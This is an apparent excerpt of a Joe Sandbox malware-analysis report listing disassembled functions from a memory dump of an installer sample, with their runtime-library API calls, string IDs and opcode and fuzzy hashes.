                                        • Part of subcall function 6CA32F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA330B7
                                      • std::ios_base::_Addstd.LIBCPMT ref: 6CA3211B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 3332196525-1866435925
                                      • Opcode ID: d13fbe435e0703590b8d411efafcc916c5df1f4c80f498221998c8d143cbbb07
                                      • Instruction ID: c8f56a7e5e1cd912faee63e36c495b585bf095270e2cceeb165f370b15660adc
                                      • Opcode Fuzzy Hash: d13fbe435e0703590b8d411efafcc916c5df1f4c80f498221998c8d143cbbb07
                                      • Instruction Fuzzy Hash: 4141CFB0A003498FEB00CF64D8457AEBBB0FF49314F149268E919AB781E7759985CFD0
                                      Function 6CBD0584 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: 0$LrJ$x
                                      • API String ID: 3519838083-658305261
                                      • Opcode ID: 95611479d40a215ec944db407e0a8f4bd880271165c87792ba86edb23d6a866c
                                      • Instruction ID: 8669de3080e4c4a3c0c189618332f105490436c8690984c53140be041735642f
                                      • Opcode Fuzzy Hash: 95611479d40a215ec944db407e0a8f4bd880271165c87792ba86edb23d6a866c
                                      • Instruction Fuzzy Hash: 73216D36D011999BCF04DBD8D990AEEB7B5EF99308F20006AE41177640DB756E08CBA1
                                      Function 6CBC7EC7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBC7ECC
                                        • Part of subcall function 6CBB258A: __EH_prolog.LIBCMT ref: 6CBB258F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: :hJ$dJ$xJ
                                      • API String ID: 3519838083-2437443688
                                      • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                      • Instruction ID: 2656c62251e04bca91c51505a725d052b9e5df1d052105817932400e9979e9ed
                                      • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                      • Instruction Fuzzy Hash: 4521A9B0805B40CFC760CF6AC14429ABBF4BF2A718B50896EC0AA97B11D7B4A509CF55
                                      Function 6CB7E480 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CB7E7C0,6CA31DEA,00008000,6CB7E7C0,?,?,?,6CB7E36F,6CB7E7C0,?,00000000,6CA31DEA), ref: 6CB7E4B9
                                      • GetLastError.KERNEL32(?,?,?,6CB7E36F,6CB7E7C0,?,00000000,6CA31DEA,?,6CB87D8E,6CB7E7C0,000000FF,000000FF,00000002,00008000,6CB7E7C0), ref: 6CB7E4C3
                                      • __dosmaperr.LIBCMT ref: 6CB7E4CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer__dosmaperr
                                      • String ID: 8Q
                                      • API String ID: 2336955059-4022487301
                                      • Opcode ID: c666ebe9511f0637cc5edfd34ac3bf2e84c8a8abaef3d70a82c2938b6de717c1
                                      • Instruction ID: 0459e6d85252536658399a477833c164e68f005389ca1d359c3e1776c1024f1a
                                      • Opcode Fuzzy Hash: c666ebe9511f0637cc5edfd34ac3bf2e84c8a8abaef3d70a82c2938b6de717c1
                                      • Instruction Fuzzy Hash: BF01B532714595AFCB159F6ACC448DD3B7DEF863347240208ED21AB680EA71D9518BA1
                                      Function 6CBE61B5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBE61BA
                                        • Part of subcall function 6CBE6269: __EH_prolog.LIBCMT ref: 6CBE626E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: J$0J$DJ
                                      • API String ID: 3519838083-3152824450
                                      • Opcode ID: ae61c101c46c5c8fb0edf6ab07ecac335665618d15e9b15e4cd2ad5cdca4aa88
                                      • Instruction ID: 0db4d46cb3d7c90fa3dc936aefa3a49f98329fc634468c095ea1f0b1cedc3bbc
                                      • Opcode Fuzzy Hash: ae61c101c46c5c8fb0edf6ab07ecac335665618d15e9b15e4cd2ad5cdca4aa88
                                      • Instruction Fuzzy Hash: 6911D4B1901794CFC720CF6AC4986DAFBF0FB29304F54C86E90AA87711D7B4A508CB65
                                      Function 6CBBED0E Relevance: 6.4, Strings: 5, Instructions: 105COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: <J$DJ$HJ$TJ$]
                                      • API String ID: 0-686860805
                                      • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                      • Instruction ID: 17359947321acedc0713615700410794b4764b7e5fd1c83321913ab4e0fcf0b0
                                      • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                      • Instruction Fuzzy Hash: 26419170C052D9AFCF54DBA1D4908FEB770EF11308B6085A9E06277A60EF35E649CB92
                                      Function 6CC0C300 Relevance: 6.3, Strings: 5, Instructions: 49COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,3K$,3K@3KP3K$@3K$P3K$p3K
                                      • API String ID: 0-3393562052
                                      • Opcode ID: 56e76445033a99da05fe192590a15bb20ec13d4a39ad9bab330bef12182d4e5a
                                      • Instruction ID: 62134017a4ccf182498dcb7e31b0b0a71dca241698a5cc45037e658ab5189086
                                      • Opcode Fuzzy Hash: 56e76445033a99da05fe192590a15bb20ec13d4a39ad9bab330bef12182d4e5a
                                      • Instruction Fuzzy Hash: BF2117B1580B419FC320CF5AC48978BFBF4FB15755F50DA2ED5AA57A40C7B8A208CB98
                                      Function 6CB780A2 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,6CB72654,6CB99DD0,0000000C), ref: 6CB780A7
                                      • _free.LIBCMT ref: 6CB78104
                                      • _free.LIBCMT ref: 6CB7813A
                                      • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6CB72654,6CB99DD0,0000000C), ref: 6CB78145
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ErrorLast_free
                                      • String ID:
                                      • API String ID: 2283115069-0
                                      • Opcode ID: bc82d5b00d43222111ef46a28fe42f0063a0941ecb68f926633aa3ea8dd2172e
                                      • Instruction ID: 8d077176ab13e67c921ce8112e647bf61c0d586adf5cf7b69bca133c14a64670
                                      • Opcode Fuzzy Hash: bc82d5b00d43222111ef46a28fe42f0063a0941ecb68f926633aa3ea8dd2172e
                                      • Instruction Fuzzy Hash: 36119172345581AA9A711A769C84DAE267AEBC737CB25062AFD34F2FC0DB72CC054731
                                      Function 6CB895AA Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • WriteConsoleW.KERNEL32(00000000,?,6CB87DDC,00000000,00000000,?,6CB88241,00000000,00000001,00000000,6CB7E7C0,?,6CB7F976,?,?,6CB7E7C0), ref: 6CB895C1
                                      • GetLastError.KERNEL32(?,6CB88241,00000000,00000001,00000000,6CB7E7C0,?,6CB7F976,?,?,6CB7E7C0,?,6CB7E7C0,?,6CB7F40C,6CB891A6), ref: 6CB895CD
                                        • Part of subcall function 6CB8961E: CloseHandle.KERNEL32(FFFFFFFE,6CB895DD,?,6CB88241,00000000,00000001,00000000,6CB7E7C0,?,6CB7F976,?,?,6CB7E7C0,?,6CB7E7C0), ref: 6CB8962E
                                      • ___initconout.LIBCMT ref: 6CB895DD
                                        • Part of subcall function 6CB895FF: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CB8959B,6CB8822E,6CB7E7C0,?,6CB7F976,?,?,6CB7E7C0,?), ref: 6CB89612
                                      • WriteConsoleW.KERNEL32(00000000,?,6CB87DDC,00000000,?,6CB88241,00000000,00000001,00000000,6CB7E7C0,?,6CB7F976,?,?,6CB7E7C0,?), ref: 6CB895F2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                      • String ID:
                                      • API String ID: 2744216297-0
                                      • Opcode ID: 4e4cb3a478da6032b689f1268b380fc399b29fbf2e70ad5d14d0500a1a9109dc
                                      • Instruction ID: 41764a03c64397f65ae43909e731ee81ac712b1172bba9617dacb1d849b92bfc
                                      • Opcode Fuzzy Hash: 4e4cb3a478da6032b689f1268b380fc399b29fbf2e70ad5d14d0500a1a9109dc
                                      • Instruction Fuzzy Hash: 26F03036A01269BBCF121F92CC449DD3F76FF0A7B5B044010FE0996660DB728860DBD1
                                      Function 6CBF6BED Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 373COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: x'K$|'K
                                      • API String ID: 3519838083-1041342148
                                      • Opcode ID: a25bbfd597e839604be9dc74c608115d2298b3d137bba62e84176c22df84cc64
                                      • Instruction ID: ff933efdcc3a7667329a995594a017423bd02bc71795d27ea15c68c64936ba10
                                      • Opcode Fuzzy Hash: a25bbfd597e839604be9dc74c608115d2298b3d137bba62e84176c22df84cc64
                                      • Instruction Fuzzy Hash: A5D109308447C69ADB21DBB4C850AEEBB75EF02308F20455ED4B6A3F90DBA5694FC752
                                      Function 6CB76814 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog3_
                                      • String ID: 8Q
                                      • API String ID: 2427045233-4022487301
                                      • Opcode ID: 263f1fee230c937b4042103e4712709da1264103f8667b5acd610551795ee879
                                      • Instruction ID: 860cac8f6acf1777ffb3ccd0fbe6884bba7fcc914646683719571caa6c5ca369
                                      • Opcode Fuzzy Hash: 263f1fee230c937b4042103e4712709da1264103f8667b5acd610551795ee879
                                      • Instruction Fuzzy Hash: 4F71C670D452969BDF318F95C8406EE7A75EF45318F24822AEC30E7A40DB758845C772
                                      Function 6CBC6C20 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 224COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: @$hfJ
                                      • API String ID: 3519838083-1391159562
                                      • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                      • Instruction ID: faef3b7e4a9af8d980b4c9bd7115827cd2f029d9805ccaac846e98efabfd1df9
                                      • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                      • Instruction Fuzzy Hash: 36911970A10299DFCB10DFA9C894DEEBBB4FF19308F54452EE455E7A50D770A948CB12
                                      Function 6CBBBC58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 213COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBBBC5D
                                        • Part of subcall function 6CBBA61A: __EH_prolog.LIBCMT ref: 6CBBA61F
                                        • Part of subcall function 6CBBAA2E: __EH_prolog.LIBCMT ref: 6CBBAA33
                                        • Part of subcall function 6CBBBEA5: __EH_prolog.LIBCMT ref: 6CBBBEAA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: WZJ
                                      • API String ID: 3519838083-1089469559
                                      • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                      • Instruction ID: 3a7ded59a9a9f7661e715ff09ab149f60f1e30a15e810fda0e2fd5f2848795fd
                                      • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                      • Instruction Fuzzy Hash: 0F814935D00198DFCB15DFA8D990AEDBBB4AF09308F1040AAE516777A0DF30AE49CB61
                                      Function 6CA328E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 6CA32A76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: Jbx$Jbx
                                      • API String ID: 4194217158-1161259238
                                      • Opcode ID: c107500332ab40d30c27b793988276cc0d111445fb19567bdbe8101b1c8ef25e
                                      • Instruction ID: ca6b3276cf782a8f33609fa39e4d81f065146f7028481e01862427aa73beec41
                                      • Opcode Fuzzy Hash: c107500332ab40d30c27b793988276cc0d111445fb19567bdbe8101b1c8ef25e
                                      • Instruction Fuzzy Hash: 825103B1D002148FCB10CF69D8946AEBBB5EF89314F14866EE849DBB42E331D985CBD1
                                      Function 6CBC2F9C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: <dJ$Q
                                      • API String ID: 3519838083-2252229148
                                      • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                      • Instruction ID: 0dc9999b2c206afcf2e0d9fd9f6662101a48144e28aa273c1d9ee076e8ba9b81
                                      • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                      • Instruction Fuzzy Hash: 8E519B71A04289EFCF00DFA9D8809EDB7B5FF49318F50852EE511AB650D7319A4ACB12
                                      Function 6CBBE9B9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: $D^J
                                      • API String ID: 3519838083-3977321784
                                      • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                      • Instruction ID: 822f25ed716ddb1d6fa14a0340e7ec2deeadbedf0f42081536bc3acd2123b1f9
                                      • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                      • Instruction Fuzzy Hash: 6A413B20A045E05ED7229B6884907FCBBAAEF17308F1481D8C4926BEF1DF74598AC3D2
                                      Function 6CBD0B66 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: 8)L$8)L
                                      • API String ID: 3519838083-2235878380
                                      • Opcode ID: 1ee38908214ddba89c01b11f8f662c4b80f228d5f64c7dd9e77453d2deb43dcf
                                      • Instruction ID: 4795da1e6c167ddf4754fb29072385aac39dd583dcaac770a2c5f8b5956c991c
                                      • Opcode Fuzzy Hash: 1ee38908214ddba89c01b11f8f662c4b80f228d5f64c7dd9e77453d2deb43dcf
                                      • Instruction Fuzzy Hash: 6851BE31205A80DFC714DFA4E990AEEBBF1FF85308F65456ED59A87A60CB307848CB55
                                      Function 6CBCE606 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 128COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: qJ$#
                                      • API String ID: 3519838083-4209149730
                                      • Opcode ID: e1f34668789bc69a62d5b524bab96a8de5a2ccca07942ae6dd88fce0d8712790
                                      • Instruction ID: 7fd4be731b0731a2ea9392bb9f94b280d98eeeb34aa8b18a5b0310f88cb4c6bd
                                      • Opcode Fuzzy Hash: e1f34668789bc69a62d5b524bab96a8de5a2ccca07942ae6dd88fce0d8712790
                                      • Instruction Fuzzy Hash: 1F517C35A002C9DFCF00CFA8C5819EDBBB5EF19328F148559E811A7791D734EA19CBA2
                                      Function 6CB805EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CB87DC6), ref: 6CB8070B
                                      • __dosmaperr.LIBCMT ref: 6CB80712
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
